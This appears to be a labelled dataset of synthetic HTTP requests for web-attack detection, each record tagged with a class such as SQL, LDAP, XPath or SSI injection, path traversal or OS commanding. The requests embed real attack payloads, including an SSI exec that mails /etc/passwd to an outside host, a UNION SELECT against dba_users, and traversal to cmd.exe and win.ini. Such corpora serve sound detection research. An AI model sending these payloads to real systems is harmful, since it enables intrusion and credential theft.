End - Id: 43859
Start - Id: 38639
class: LdapInjection
GET /lEfwuast0hi/aS0dTF6yI-q/lzsne6use/sMboot.iniapTr.UNh/t@.bin?iretw=c95FtDv&mwlessslhc=%3Dm%7Cetcbstrtue9ncsh%28e&UkeE=149646&er0geqtcSsidi=h&apAhhsu9aina7in=6614%29%28%26%28objectClass%3Dslpn%29%28%7C%28sn%3D+uio%29%28cn%3Dtk+++++J*%29%29&i6uregisbwswte=101&wsAxlliayr=+ctikrttimgOmp-u3 HTTP/1.0
Host: 71.104.251.163
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Etn-nEu6
Cache-Control: max-age=6
Client-ip: 86.88.22.136
Cookie: cbnxirg87is=<lr<m6%oee;iaan=b
Cookie2: $Version="732"
Date: Sun, 23 Jan 05 20:55:30 CET
ETag: W/"3BSBwrGl0.hUle1"
Expect: sedr=mo9hfett
From: iafq7wOr@Ee3l.org
If-Modified-Since: Thu, 04 Jun 09 06:47:30 GMT
If-Unmodified-Since: Thu, 22 Feb 07 18:25:02 UTC
If-Match: *
If-None-Match: "dvqS8FclMEg-irtK0a"
If-Range: Fri, 06 Jan 06 19:52:42 CET
Max-Forwards: 4994
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: NTLM dGRrNTRlNG5ubG1kSGxuZXpzRW90ZWZkdHMydXlnbHJkc3I3bndHb2V5aGU=
Authorization: NTLM dWVFZWNnN1NlZVVlcE1oaUxpVHR5bWVxdG9SaWVsYUxvcm5zbjRlcmN6dG4=
Range: 25834-,48-325537
Referer: http://www.sispeTcl.st/nrt1e/recnnelo/todAe.wmn
TE: deflate;q=0.9,chunked;q=0.3,deflate;q=0.0
Trailer: If-Modified-Since
User-Agent: Mozilla/3.9 (Machintosh; U; PPC 2.6; dt-au; rv:8.9.9) Gecko/46072962
UA-CPU: MIPS
UA-Disp: 397,637,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 601x4009
Via: HTTP/7.0 19.18.247.233
Transfer-Encoding: identity
Upgrade: ehlec/7.4, tt07/0.9, ls7e/0.7
Warning: 509 249.249.5.171 "evmsicsfdrnmFbad" 
X-Forwarded-For: 72.129.37.147
X-Serial-Number: 3254523964
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38639
Start - Id: 35127
class: SqlInjection
POST /nc5/tpNNqJq/hxdr/93sq/sdpytrsihxiatS7/atap7sro/YAYgiuqg.php4? HTTP/1.0
Content-Length: 226
Content-Language: ndt9etrl
Content-Encoding: deflate
Content-Location: /lrroa/tsNwo/Amja/rediad/lGlrs.shtml
Content-MD5: ZTJobDRjZUV0bmlldGE2bA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 08 Nov 06 20:45:12 GMT
Last-Modified: Tue, 20 Feb 07 19:13:56 CET
Host: 244.239.76.171
Connection: pBhh
Accept: */*;q=0.0
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: yjLa=y
Client-ip: 86.214.16.25
Cookie: n2p=4nnnEtkh8owmmEtnx;es=y3l/-e$1ctcvarel;eqQ_-F=b6BiL;nvwp5c=8<etc
Cookie2: $Version="43"
Date: Sat, 05 Apr 08 10:40:11 GMT
ETag: "wECWPXUQhi-PB9N"
Expect: Snt7u=ransaaGt;bmoobhrm
If-Modified-Since: Mon, 30 Mar 09 20:40:59 CET
If-Unmodified-Since: Mon, 28 Jan 08 20:40:25 CET
If-Match: *
If-None-Match: "TgYUygSVUAV0SzAChIny"
If-Range: Tue, 08 Apr 08 12:03:22 CET
Max-Forwards: 4
Pragma: 9wn=6ieFepUa
Proxy-Authorization: Digest cnonce="cejy"
Authorization: gIig oszme7=Efr9
Range: 10-04,-66
Referer: http://www.eycers.biz/kNuaoLtq/ragB/asoie/jels/itnhNo.txt
TE: trailers,trailers,deflate
User-Agent: yOmXyHmZ http://www.evals.biz
UA-Disp: 124,974,8
UA-OS: Windows NT
UA-Color: color8
Via: 6edt/8.1 41.85.213.179, ycee/9.6 www.sisy.shtml
Transfer-Encoding: rdtn
Upgrade: masee/8.5, drdmb/5.6, asJ/9.9, oume2Y/4.6, pmsuya/8.2
X-Forwarded-For: 126.226.47.150
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rtoi1hee0bF=zdLdi]catyebd l8&gamdle=5893487&eTeai=OR     'lxsZeC'     IN (   '   '   )&y8JKC1J=9&3e2er6t=fac&oda=o21H_nBOkk1&tnrisnnYaorlhx=x3Xq&JHidlhRWoi=xh5su+[hdk&oariLuindr=750&tf=t8c6IrQRCZ&echoGO2=8333

End - Id: 35127
Start - Id: 49795
class: XPathInjection
GET /tw/sgFZr5_l-q/hVihZDgNkX5nIXHX2SU/ehqInhmeANj.jpg?aittvdszolsz=ss3%27+++++or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++or+++%277leid%27%3D+++%27 HTTP/1.1
Host: www.arhe.org
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, gzip
Accept-Language: sp-Uxeyy8li, Na-meebcrhq;q=0.1
Cache-Control: ej8sdar=Xr3lzrii
Client-ip: 216.6.156.7
Cookie: or81nl=onictkchjaysetf2rt;dnIlrev=4686759367
Cookie2: $Version="493"
Date: Sat, 19 Jan 08 07:58:27 GMT
ETag: W/"8Nw-K59c314vRFuXk"
Expect: 100-continue
From: soenml@saae0wd.org
If-Modified-Since: Sun, 14 Aug 05 17:21:28 GMT
If-Unmodified-Since: Tue, 16 Jan 07 03:39:54 UTC
If-Match: "iJHTf0cUl7AewDBTkq"
If-None-Match: "XQEPajdmxpZtqu1yBy"
If-Range: Mon, 04 Jun 07 18:06:18 GMT
Max-Forwards: 584
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: rSty h1Ur7n=AeSu
Range: 1-,586-,-3399
Referer: /a4eaayr/e9re5si/endd/ajntfarz/styV.swf
TE: trailers
Trailer: Connection
User-Agent: Mozilla/5.9 (Machintosh; U; PPC 6.6; ny-Sx; rv:2.3.2) Gecko/51665884
UA-CPU: x86
UA-Disp: 662,518,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 742x2872
Via: blani/4.6 229.12.67.27, FTP/6.6 www.Ng5s2.shtml, 9.5 250.149.189.69
Transfer-Encoding: deflate
Upgrade: afn/1.9, wee/7.0
Warning: 972 67.57.148.71 "btc9redfdijsq0" 
X-Forwarded-For: 203.64.166.11
X-Serial-Number: 09611302404410791541
----: ----------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 49795
Start - Id: 40022
class: SSI
GET /ntqenaswtoxsIvCihed/VwhereMbmNservicess/nVmXdQ1/hWbSCoY2vMUSaohM/at6nheyriNtioe/7AsmS_xOP639Q/Eb.mdb?mJMY.zsPGW=ae+v%5Dsdrop&pcntx1yEy=6277683&naasenoi29oeH=zmoS%29iaeninput8delete&ie=%3C%21--%23exec+++cmd%3D%22%2Fbin%2Fmail++++zfon.com+++%3C+%2Fetc%2Fpasswd%22--%3E&sf=fc%40-g.pY7&relaushnxt=ostdooserehAh&eosvieao=cwget HTTP/1.0
Host: www.c2m6W.ch:47805
Connection: keep-alive
Accept: */*
Accept-Charset: isiri-3342;q=0.5, cp-936
Accept-Encoding: 
Accept-Language: 5rAtr-tFrmpnst;q=0.9
Cache-Control: Itap7e=we
Client-ip: 52.59.150.100
Cookie: @.jW-=rerjt795dEd;m9rnc3tXe=te ;elLeihhnonedBr=d~hgn)(7;Hajtn=qplafaan;eeefnrIyWEhfT=097;ayneri3Rvx=046
Cookie2: $Version="3"
Date: Mon, 26 May 08 01:25:47 UTC
ETag: W/"InT@8Fc@jEaB.CC3M5"
Expect: eerIners
From: bic3us@lb0or.fr
If-Modified-Since: Sun, 11 Feb 07 03:54:13 CET
If-Unmodified-Since: Tue, 25 Apr 06 18:12:54 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 17 Jan 06 02:21:42 GMT
Max-Forwards: 4
MIME-Version: 9.8
Pragma: t=xsA3namm
Proxy-Authorization: Digest nc=dAb63AAe
Authorization: Digest cnonce="ainumz"
Range: 639193-1,618159-02
Referer: http://5erf6i.it/icopmeeo/lRiRt/esar/nhDrlxa0.ace
TE: trailers,deflate;q=0.0
Trailer: Host
User-Agent: duldhm (rjTsS-aX; vpkl2fKCFC)
UA-CPU: Sparc
UA-Disp: 270,463,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5394x1347
Via: trnmD/4.9 254.147.141.148, 2.3 244.133.93.199
Transfer-Encoding: gzip
Upgrade: temy/8.7, Aane0/2.7, d4ta/9.2
Warning: 801 www.A9Ccfets.tiff "iayeatistfeuar6rsnb" "Tue, 13 Sep 05 19:40:44 GMT"
X-Forwarded-For: 92.41.36.53
X-Serial-Number: 18116
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40022
Start - Id: 38276
class: LdapInjection
GET /Honodeq/psb%u/copyVinPMf6V-/eHAhS93T/4vg9gfB9LAT3c7NLqOWr/tgs23fgi14ASJw/wri3sgannIenpr/l@_/aei5Uiealioa/ei/zenst5swoOdrTOe/L_HMX6.jsp?x6Jwindow.openKkp=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: www.laaMly.gov
Connection: close
Accept: application/*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: nndrl2-1cyv, it-n, ralop-m8szi1ta;q=0.5, zt7h8-nmaPatrw;q=0.6
Cache-Control: only-if-cached
Client-ip: 227.248.33.223
Cookie: h8n=38
Cookie2: $Version="30"
Date: Sat, 28 Oct 06 18:04:58 GMT
ETag: W/"-Hht-R8UXNeiOEIFFnX"
Expect: tAzr=tatnlN;dctei7iv
From: iaon@um9ltetugp.biz
If-Modified-Since: Fri, 18 May 07 18:16:33 GMT
If-Unmodified-Since: Sat, 28 Oct 06 11:51:31 UTC
If-Match: "XdH2l0gCAt6oyvun6"
If-None-Match: *
If-Range: *
Max-Forwards: 326
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Digest username="mscm"
Authorization: Basic U3NrYWdlZTY6b2Q3eA==
Range: 14-
Referer: /enxl.css
TE: deflate,chunked;q=0.7,deflate
Trailer: Proxy-Authorization
User-Agent: dLcaa (gnpTu4X; rFogXK9EhT; i.D5Rn.2F; ceqKEp)
UA-CPU: PowerPC
UA-Disp: 284,6564,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 4041x0261
Via: HTTP/2.2 www.ue71f30o.css
Transfer-Encoding: gzip
Upgrade: o4f/8.5, ihuE/9.9
Warning: 420 www.hNfxAea.shtml "ha5earnepwc" "Thu, 20 Jan 05 10:55:49 UTC"
X-Forwarded-For: 165.116.155.114
X-Serial-Number: 70527822
----: ------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 38276
Start - Id: 45904
class: PathTransversal
GET /smmydieawhridoeszor/goithmo9h/4W.aB.pl?nee6l=tew%3En6psQan&owsjhoeirt7=962736&lisewtotrgh55=xlSice&78nyioesrr=sam7%40a&7p5_NYh1=07737&PoVS.-=sonhYgr%29window.opent&aVB=ln%7Ci8ttSnrs%29t&seara=93198279&ws4rosg=7543885034&mcqJZ9wtJvWs=c%3A%5C%5CWINNT%5C%5Cwin.ini HTTP/1.1
Host: 98.82.45.217:80
Connection: vitn2d
Accept: image/*;q=0.6
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 132.53.138.134
Cookie: 1al2Rbqyr=yEub;ooLal8shtph=931;Dwyatplyeu7netM=eacopy7ce0;4m62phttpiJpVBq=40880;slneetOte7ayoa8=yuJcKFK;aFtatenhlS=xzte
Cookie2: $Version="43"
Date: Fri, 13 Jan 06 12:14:19 GMT
ETag: "I5Zacwl6TPqEQ2Zm"
Expect: 100-continue
From: sdns@tal3sea.gov
If-Modified-Since: Mon, 15 Mar 10 01:47:59 UTC
If-Unmodified-Since: Tue, 17 Feb 04 03:08:23 CET
If-Match: *
If-None-Match: *
If-Range: "aj7FTihZincJyP."
Max-Forwards: 833
MIME-Version: 4.5
Pragma: p='aromn'
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: Basic ZWM4aWE6b2VyMVMyZQ==
Range: 2-4458,00-
Referer: http://ehds.biz/jeeefc/LsReo/Oesndje/tYhglI.php4
TE: trailers,chunked
Trailer: If-Range
User-Agent: Mozilla/3.3 (X11; U; Linux i386 0.2; eb-m8; rv:8.7.1) Gecko/80367655
UA-CPU: StrongARM
UA-Disp: 1794,840,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 4595x1071
Via: 2.7 www.Izhie.html, HTTP/7.6 www.deRe5aec.tiff
Transfer-Encoding: gzip
Upgrade: 9sy/9.0, apeda/8.6, mmS3/2.1
Warning: 059 www.ksairqwg.js:39883 "donee6dnsowllcjs" "Sat, 22 Jan 05 11:00:58 CET"
X-Forwarded-For: 205.145.84.10
X-Serial-Number: 7456585947858
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45904
Start - Id: 46126
class: PathTransversal
POST /lTCLG@/eERZv4SsYNupUrF/9uau52lsveJrSoeio/nrisisamtrl.jsp? HTTP/1.0
Content-Length: 240
Content-Language: aNo,4nYsnHyj,egyYl
Content-Encoding: deflate
Content-Location: http://1rellyeo.de/nw9f.fgf
Content-MD5: aXNPcFRpaW9lbmZGYmU3cw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Feb 06 18:03:52 CET
Last-Modified: Thu, 04 Oct 07 03:14:09 GMT
Host: 95.209.56.29:4391
Connection: close
Accept: audio/*
Accept-Charset: euc-kr
Accept-Encoding: compress;q=0.1, identity;q=0.4, identity;q=0.4, gzip;q=0.9, compress
Accept-Language: xt-om;q=0.5, tie-f;q=0.8
Cache-Control: no-cache
Cookie: Sk8Z7AsSxi=owiOH3H;veehioau4Es=r_zyRAfbypi
Cookie2: $Version="39"
Date: Mon, 09 Apr 07 02:57:36 GMT
If-Modified-Since: Wed, 11 Apr 07 17:48:29 GMT
If-Unmodified-Since: Sun, 21 Nov 04 07:33:47 UTC
If-Match: *
If-None-Match: "3qxEctoUD9PiVD3"
If-Range: Mon, 15 Jan 07 17:35:39 UTC
Max-Forwards: 068
Pragma: meeoe='eoRtao8'
Authorization: T0jfq aYoneuq=a4tysj
Range: 55330-08,72-9
Referer: /qien/zoebtoac/Thewl.mpeg
TE: chunked,trailers,trailers
Trailer: Host
User-Agent: Mozilla/8.7 (Machintosh; U; Mac OS X 0.7; ti-e9; rv:7.2.5) Gecko/05690773
UA-Color: color16
UA-Pixels: 106x0388
Via: HTTP/8.9 88.55.107.49, HTTP/7.6 237.47.27.168
Transfer-Encoding: identity
Upgrade: ocfh3/0.8, wds/5.3, eda/9.0, eSS/4.4, ikt/4.1
Warning: 398 www.erno.tiff:75 "uaihrtmhhjaneIbin" 
X-Serial-Number: 56816261659561
----: ----------------------------------------

cnaf4re=er&nhs7yiwaizr=oJE&Eteo=c&iifsci=h)2&aChu=81982067&q9nselusns=2833344&ioWfi=../../../../../../proc/version&oosSaoneas=36&oel7semseebc=http\awindow.openusr6fa9stcat(&lto=SftpbS&IenlsRmdren7o=openmd&8i9epat=8575419

End - Id: 46126
Start - Id: 44333
class: OsCommanding
GET /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 44.64.151.148
Connection: aermtWt
Accept: audio/*, image/jpeg, video/*
Accept-Charset: iso-2022-kr
Accept-Encoding: 
Accept-Language: civ-tu;q=0.2, t-iOSbser6;q=0.3
Cache-Control: max-stale=53
Client-ip: 70.255.193.81
Cookie: eosleoth=Anm8zy~
Cookie2: $Version="29"
Date: Thu, 18 Dec 08 09:24:26 CET
ETag: "JwOlqko42x3NtlOT"
Expect: tnstr3=Ht7tPac;rhjSmod
From: ssaaei@srTei5is.de
If-Modified-Since: Wed, 03 Aug 05 08:19:23 CET
If-Unmodified-Since: Sat, 12 Apr 08 15:01:37 GMT
If-Match: *
If-None-Match: *
If-Range: "KifzXthQy8DwbK-h6d"
Max-Forwards: 1
MIME-Version: 1.6
Pragma: htx5P='d'
Proxy-Authorization: Basic T2hsMGg6YWFhMg==
Authorization: Digest qop=o9hhYhvt
Range: 88-15414
Referer: /ndte/r7net/4lHsymc/p1kdh/rdwis.mdb
TE: trailers
Trailer: If-None-Match
User-Agent: t.wyn3oMi http://www.do9bdF.gov
UA-CPU: PowerPC
UA-Disp: 8897,9221,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 127x111
Via: ao4d8z/0.3 www.Fpodoa6.htm, 0.7 102.52.140.200, byeheb/8.3 39.125.50.193:9139
Transfer-Encoding: gzip
Upgrade: srlma/8.2, So6/5.2, moPz/7.3, aeng/1.5, aoyO0a/8.2
Warning: 450 137.33.40.57 "ymhep" "Sat, 27 May 06 20:03:51 UTC"
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 4707675607021024979
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44333
Start - Id: 44654
class: PathTransversal
GET /mSS-a_9sONUs0/sdUvLPzUAmZ.png? HTTP/1.1
Host: www.OrE4dedm.st
Connection: eleglr
Accept: video/quicktime
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: min-fresh=650
Client-ip: 139.92.31.112
Cookie: ee=83;aertiE=%2e%2e.\%252f/\%252f/...\%252e..%2e;heafSo8eksgwIo=snt
Date: Fri, 19 Nov 04 21:49:46 CET
ETag: "G8RoO1wQGoM8LAIfi6G"
Expect: 100-continue
If-Modified-Since: Sun, 07 Feb 10 17:55:45 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 30 May 07 04:38:40 UTC
Max-Forwards: 0191
Pragma: mennx7so=ZtnEs
Authorization: NTLM ZGNlbnVtaDhyY3doaDZtZW5vZTA1bmhudGVhcmxmU2k0dmVibnRmZ21lYXUzdG8=
Range: 2485-,266-3,-56504
Referer: http://lm9ts.ch/snosjhl/otaoSo/Reetky.tar
TE: chunked;q=0.3
Trailer: Connection
User-Agent: Mozilla/5.4 (X11; U; Unix 9.1; ot-er; rv:0.1.0) Gecko/06147976
UA-CPU: MIPS
UA-Pixels: 8872x5937
Via: sst/4.8 97.98.157.170:31446
Transfer-Encoding: compress
Upgrade: ervl/3.1, rWat5n/5.8
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44654
Start - Id: 45638
class: PathTransversal
GET /mKA7Th_pHVghdv/DFGdyK/Hb/hsvwtlT4iapofd/inuE2da/5YFz5vkxQ.msf?or=irl_&fe_kYTV23IJwinnt=i%3A%5C%5CWINNT%5C%5Cwin.ini&xIhtaccesu7positionTDz58C=naacrd5Sihtpasseb HTTP/1.0
Host: 20.111.161.70
Connection: ttncfonc
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 220.15.215.234
Cookie: omcelm7iK1ldl=aw~itinLyad;e8wrtihrFogz=ddfuwree8ittligt
Cookie2: $Version="56"
Date: Mon, 10 Nov 08 24:14:12 GMT
ETag: W/"uiNwMQd.pGn0zWNudmL"
Expect: 100-continue
From: soov59N@5mxue.fr
If-Modified-Since: Mon, 17 Mar 08 07:36:13 GMT
If-Unmodified-Since: Wed, 02 Nov 05 13:59:52 GMT
If-Match: "wQuaWOgw95DBGHFkE"
If-None-Match: "yeVFiT5pXsOY.0tcI"
If-Range: *
Max-Forwards: 418
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: NTLM b2FhZG5ubmVzZTgwd1BHb2V0c2NpZXNiT2VtZXJhYXJvZXRuZnJhbWNhbw==
Authorization: Digest uri=/imexzta/laneCe/iiafH/tnesreDw.msf
Range: -5753
Referer: http://www.iIleH5.org/etracale.mdb
TE: chunked;q=0.5,trailers
Trailer: Upgrade
User-Agent: bFxqIr http://www.aiapepc.it
UA-CPU: Sparc
UA-Disp: 4093,504,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 822x7787
Via: FTP/1.6 www.ermeVrw.jpeg, entho/7.7 www.EnBs.jpg
Transfer-Encoding: compress
Upgrade: 8mc5/8.9
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 6406326694
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45638
Start - Id: 42554
class: SqlInjection
GET /h-F38ixOJqkftc/E.r@i5CygWAXscript/iQet/5Rt5/0N49qZc_0MLwLbmy2.jpeg?rqros=2ea%28NimaYdgpimge&s7kr=lw9mHoHXH&atteteey=pibatetiei&eu4oTfiidEs=sihinolLJe&cheoLne9fso=39580225&fj8xuL-=chairs%27+++++UNION+++SELECT+++wmn+++FROM++++dba_users++++WHERE+++++name++++like+++++%27%2525 HTTP/1.1
Host: www.ad8da.uk
Connection: close
Accept: text/xml;q=0.5, text/html, video/mpeg;q=0.4
Accept-Charset: euc-jp, us-ascii, isiri-3342, windows-1251
Accept-Encoding: *;q=0.0
Accept-Language: ttuim-ietaairn, hemfu-h, oeg-cga;q=0.4
Cache-Control: no-cache
Client-ip: 58.127.136.100
Cookie: otoeojir=759553716;Ecraetiu4eabe05=ln;Tddo=4n;ecngarm=edzt6
Cookie2: $Version="597"
Date: Tue, 25 May 04 17:10:04 UTC
ETag: W/"Kz4lucxZCwp.GwKmCHYS"
Expect: 100-continue
From: ygate@zW0nfe.com
If-Modified-Since: Thu, 10 Sep 09 18:20:57 CET
If-Unmodified-Since: Fri, 24 Dec 04 18:24:18 CET
If-Match: *
If-None-Match: "gIpsjGeRUFY.ZzAqf"
If-Range: Thu, 03 Sep 09 22:22:36 GMT
Max-Forwards: 94
MIME-Version: 8.8
Pragma: ayna='va'
Proxy-Authorization: Basic b3JoaWlzczowbjVuZWlP
Authorization: NTLM YWNjZ0FuRUd0aGVpb3djeWRlb3lnc3RBbGFlZHluczh1b3RidGx0bzNOSUU=
Range: -9299
Referer: http://aearymee.net/unIdguob/late/ob2a.php3
TE: gzip
Trailer: Upgrade
User-Agent: usdhmte/0.9.7
UA-CPU: x86
UA-Disp: 962,664,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8264x986
Via: HTTP/1.9 www.raotu6.html
Transfer-Encoding: compress
Upgrade: oui/8.3, tn8/9.7
Warning: 932 195.72.254.121:53 "lnpgreue" "Fri, 16 Oct 09 14:01:22 GMT"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 14019668167016941
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42554
Start - Id: 42135
class: SqlInjection
GET /sBVyQbF-Ly@yU.eYE0dT/nV2@Rw-Cxz6Ed_/oJsZjj/te5eReldw.html?d3rWi206=++++OR+2+++++%3E++1&itdriU=0&idef8m4n=leii&cpjYCeo3wget=stdin%3Ego%3Cwhere5&hpuaeAzhec5i=a HTTP/1.0
Host: 242.185.20.64
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, gzip;q=0.0, gzip, deflate;q=0.7
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 56.112.127.62
Cookie: G8.cSn=50;KTWJU0=m
Cookie2: $Version="9"
Date: Tue, 05 Oct 04 01:20:33 CET
ETag: "0001eTV1fhWM6qkm"
Expect: ahiWkN=nO6ei
From: yaieolw@dAieet.st
If-Modified-Since: Wed, 19 Oct 05 09:49:50 GMT
If-Unmodified-Since: Fri, 25 May 07 19:18:44 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 18 Aug 05 04:25:51 CET
Max-Forwards: 465
MIME-Version: 0.7
Pragma: 2ac='PNt'
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest cnonce="nLrhAD"
Range: 80-3804,023297-91,09-
Referer: http://ws1n.com/nx7awor/ggnuAtcC/09h6e4i/0e4i1/eeajweee.tar
TE: trailers
Trailer: Range
User-Agent: edhhaqpl3lvIr4o4ewh
UA-CPU: StrongARM
UA-Disp: 1126,087,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 929x052
Via: FTP/1.3 www.gIebsn.shtml, 2.8 219.149.254.52, FTP/7.6 88.244.229.66
Transfer-Encoding: compress
Upgrade: dct/0.8, isti/6.6, rDb4l/1.0
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 45705
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42135
Start - Id: 40411
class: SSI
POST /sJxL9SQMOEKQkPVvWLYU/nLrrWp2u_ny1I-J/veEli1eedevsecnjbw/e0Wu/6srEnen/spshNMgIiIm6EfQe/et63/lMUE/es9/eR/acdfenpFrormda.html? HTTP/1.1
Content-Length: 262
Content-Language: tDsbnflL,lh90ahiu
Content-Encoding: gzip
Content-Location: /yjksawgE/Juoess/ersismn/0Alc.php4
Content-MD5: cGxlbjJidHJiaGV1QW9Fbw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 04 Jan 08 23:03:49 GMT
Last-Modified: Fri, 08 Dec 06 09:32:30 CET
Host: www.rEo2stlT.gov
Connection: mo6keii
Accept: image/png, application/zip;q=0.2
Accept-Charset: utf-8, windows-874;q=0.3, windows-1255;q=0.9
Accept-Encoding: gzip;q=0.8
Accept-Language: *
Cache-Control: no-store
Client-ip: 21.209.58.212
Cookie: I0rnTve8tgrat=nveiA7c0o3atn;i1Q9oma8Ev=zMNyl;6treuzbkteEmg=47a7I0b
Cookie2: $Version="3"
Date: Tue, 08 Jul 08 08:22:26 GMT
ETag: W/"5EI0NvigZQ0wYh_Mhu1T"
Expect: ovas=1u9n
From: rQkb4al@ootSiafmsu.cz
If-Modified-Since: Tue, 09 Mar 10 05:13:46 CET
If-Unmodified-Since: Mon, 19 Sep 05 06:41:24 UTC
If-Match: "H@4xZSHCrMLpiauRTa"
If-None-Match: "xobaa6lqsa0xLm6"
If-Range: Wed, 02 Jan 08 01:08:41 UTC
Max-Forwards: 4
MIME-Version: 6.8
Pragma: t='8'
Proxy-Authorization: l4te9v tifnO=sIwmcnTg
Authorization: Thynon nrpni=otts
Range: 2675-,251-0,7744-
Referer: /nabi4ij/0teauy/ErqO4/qyr4ovU/sOhn.bin
TE: chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.1 (compatible; MSIE 6.2; Linux i386; Rdetbrol)
UA-CPU: 68000
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5480x145
Via: FTP/2.9 www.htnNro.jpeg
Transfer-Encoding: deflate
Upgrade: ufb/8.5, d45i3/7.9
Warning: 389 77.79.203.151 "rgu8ceCttvaeeZctdwT" "Tue, 30 Dec 08 18:23:42 CET"
X-Forwarded-For: 55.196.49.158
X-Serial-Number: 139491400709
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Htou=iatsktbes35]iframeowherene &x-OxHammPC2=e-lcppre&ihop=5Wty)&OhlsWjn8mHnk=aeneiRnyl&ilne=aa&uotmv=yhhobjecto&iteteiIe7O=<!--#include   virtual="d:\windows\autoexec.bat" -->&rdc=e>jonoifBeo&trzmyahaMn=hfdboot.inii&0stifhaPedie=437409

End - Id: 40411
Start - Id: 40597
class: SSI
GET /w1pI62owete5a0fte1es/lBfV3mb@mH-9W75x-/ticyBmzAG2Ny_6QtLXM/CrD0B/iBl.i/aibooa6mgladsesbhtu/c6eakeaovhe5t9fg.jpeg?t1iraNietn=sFv5EQOp&Drte=7378449236&trrwdoohhhozito=eheacceptrl4oupdaterD&ono=etce+dropr%24rli7i&oD=%2Fc%27yebtinilApn&aNa=1&ismepyLn=H&bs2aaAmiDn=5gRI_Q&9ks=662320&RHhchaedinjjem=%2Fhaeb&O9nPm=nb&gtgDesAt=if1usn&nennet9=dalsex1dAc&hCetool=%3C%21--+++++%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E HTTP/1.1
Host: 171.225.64.31:80
Connection: keep-alive
Accept: text/*, text/*;q=0.1, text/html;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 26.51.86.223
Cookie: tcaps4ihdtee=24628
Cookie2: $Version="83"
Date: Sat, 09 May 09 10:51:38 GMT
ETag: W/"bb110ijb0AjJQj0"
Expect: 100-continue
From: rboa@y3rzvAlmvo.org
If-Modified-Since: Fri, 14 Oct 05 02:58:11 UTC
If-Unmodified-Since: Mon, 16 Oct 06 23:28:42 GMT
If-Match: *
If-None-Match: "5su93wFTRxZkDDpj"
If-Range: *
Max-Forwards: 5
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Digest algorithm=ekoie
Authorization: Basic bHR1cmx0OnlocmNwcmc=
Range: 67529-
Referer: http://www.eraptNr.gov/5motY8h.zip
TE: gzip;q=0.3
Trailer: Warning
User-Agent: eyI6e1nntnos
UA-CPU: StrongARM
UA-Disp: 4510,669,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 7337x662
Via: 8.8 www.tadib.tiff:909, 1.9 111.169.130.109
Transfer-Encoding: deflate
Upgrade: sez4st/8.2, mnseuu/1.0, fszf/8.0
